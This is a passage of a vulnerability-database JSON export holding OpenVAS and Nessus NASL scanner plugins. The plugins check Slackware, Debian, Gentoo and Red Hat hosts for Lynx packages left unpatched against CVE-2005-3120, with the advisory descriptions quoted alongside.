lynx", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2005_310_03.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New Lynx packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\nand -current to fix a security issue. An overflow could result in the\nexecution of arbitrary code when using Lynx to connect to a malicious NNTP\nserver.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2005-310-03.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2005-310-03\";\n \nif(description)\n{\n script_id(55806);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2005-310-03 lynx\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i386-1\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "description": "The remote host is missing an update to lynx-ssl\nannounced via advisory DSA 876-1.\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.2.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55752", "id": "OPENVAS:55752", "title": "Debian Security Advisory DSA 876-1 (lynx-ssl)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_876_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 876-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1 of lynx.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your lynx-ssl package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20876-1\";\ntag_summary = \"The remote host is missing an update to lynx-ssl\nannounced via advisory DSA 876-1.\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.2.\";\n\n\nif(description)\n{\n script_id(55752);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:03:37 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 876-1 (lynx-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lynx-ssl\", ver:\"2.8.4.1b-3.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:54", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200510-15.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55658", "id": "OPENVAS:55658", "title": "Gentoo Security Advisory GLSA 200510-15 (Lynx)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Lynx contains a buffer overflow that may be exploited to execute arbitrary\ncode.\";\ntag_solution = \"All Lynx users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200510-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=108451\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200510-15.\";\n\n \n\nif(description)\n{\n script_id(55658);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200510-15 (Lynx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-client/lynx\", unaffected: make_list(\"ge 2.8.5-r1\"), vulnerable: make_list(\"lt 2.8.5-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:58", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2005-310-03.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231055806", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231055806", "title": "Slackware Advisory SSA:2005-310-03 lynx", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2005_310_03.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.55806\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2005-310-03 lynx\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0|10\\.1|10\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2005-310-03\");\n\n script_tag(name:\"insight\", value:\"New Lynx packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\nand -current to fix a security issue. An overflow could result in the\nexecution of arbitrary code when using Lynx to connect to a malicious NNTP\nserver.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2005-310-03.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update to lynx-ssl\nannounced via advisory DSA 1085-1.\n\n\nSeveral vulnerabilities have been discoverd in lynx, the popular\ntext-mode WWW browser. The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities:\n\nCVE-2004-1617\n\nMichal Zalewski discovered that lynx is not able to grok invalid\nHTML including a TEXTAREA tag with a large COLS value and a large\ntag name in an element that is not terminated, and loops forever\ntrying to render the broken HTML.\n\nCVE-2005-3120\n\nUlf H\u00e4rnhammar discovered a buffer overflow that can be remotely\nexploited. During the handling of Asian characters when connecting\nto an NNTP server lynx can be tricked to write past the boundary\nof a buffer which can lead to the execution of arbitrary code.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 2.8.5-2.5woody1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56855", "id": "OPENVAS:56855", "title": "Debian Security Advisory DSA 1085-1 (lynx-ssl)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1085_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1085-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 2.8.6-9sarge1.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your lynx-cur package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201085-1\";\ntag_summary = \"The remote host is missing an update to lynx-ssl\nannounced via advisory DSA 1085-1.\n\n\nSeveral vulnerabilities have been discoverd in lynx, the popular\ntext-mode WWW browser. The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities:\n\nCVE-2004-1617\n\nMichal Zalewski discovered that lynx is not able to grok invalid\nHTML including a TEXTAREA tag with a large COLS value and a large\ntag name in an element that is not terminated, and loops forever\ntrying to render the broken HTML.\n\nCVE-2005-3120\n\nUlf H\u00e4rnhammar discovered a buffer overflow that can be remotely\nexploited. During the handling of Asian characters when connecting\nto an NNTP server lynx can be tricked to write past the boundary\nof a buffer which can lead to the execution of arbitrary code.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 2.8.5-2.5woody1.\";\n\n\nif(description)\n{\n script_id(56855);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-1617\", \"CVE-2005-3120\");\n script_bugtraq_id(11443);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1085-1 (lynx-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lynx-cur-wrapper\", ver:\"2.8.5-2.5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lynx-cur\", ver:\"2.8.5-2.5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lynx-cur-wrapper\", ver:\"2.8.6-9sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lynx-cur\", ver:\"2.8.6-9sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-12-13T07:01:19", "bulletinFamily": "scanner", "description": "Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-876.NASL", "href": "https://www.tenable.com/plugins/nessus/22742", "published": "2006-10-14T00:00:00", "title": "Debian DSA-876-1 : lynx-ssl - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-876. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22742);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:19\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"DSA\", value:\"876\");\n\n script_name(english:\"Debian DSA-876-1 : lynx-ssl - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-876\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lynx-ssl package.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1 of lynx.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lynx-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"lynx-ssl\", reference:\"2.8.4.1b-3.2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lynx-ssl\", reference:\"2.8.5-2sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:52:37", "bulletinFamily": "scanner", "description": "An updated lynx package that corrects a security flaw is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nLynx is a text-based Web browser.\n\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\nconnections to NNTP (news) servers. An attacker could create a web\npage redirecting to a malicious news server which could execute\narbitrary code as the user running lynx. The Common Vulnerabilities\nand Exposures project assigned the name CVE-2005-3120 to this issue.\n\nUsers should update to this erratum package, which contains a\nbackported patch to correct this issue.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2005-803.NASL", "href": "https://www.tenable.com/plugins/nessus/20051", "published": "2005-10-19T00:00:00", "title": "RHEL 2.1 / 3 / 4 : lynx (RHSA-2005:803)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:803. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20051);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:11\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_bugtraq_id(15117);\n script_xref(name:\"RHSA\", value:\"2005:803\");\n\n script_name(english:\"RHEL 2.1 / 3 / 4 : lynx (RHSA-2005:803)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated lynx package that corrects a security flaw is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nLynx is a text-based Web browser.\n\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\nconnections to NNTP (news) servers. An attacker could create a web\npage redirecting to a malicious news server which could execute\narbitrary code as the user running lynx. The Common Vulnerabilities\nand Exposures project assigned the name CVE-2005-3120 to this issue.\n\nUsers should update to this erratum package, which contains a\nbackported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:803\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected lynx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(2\\.1|3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 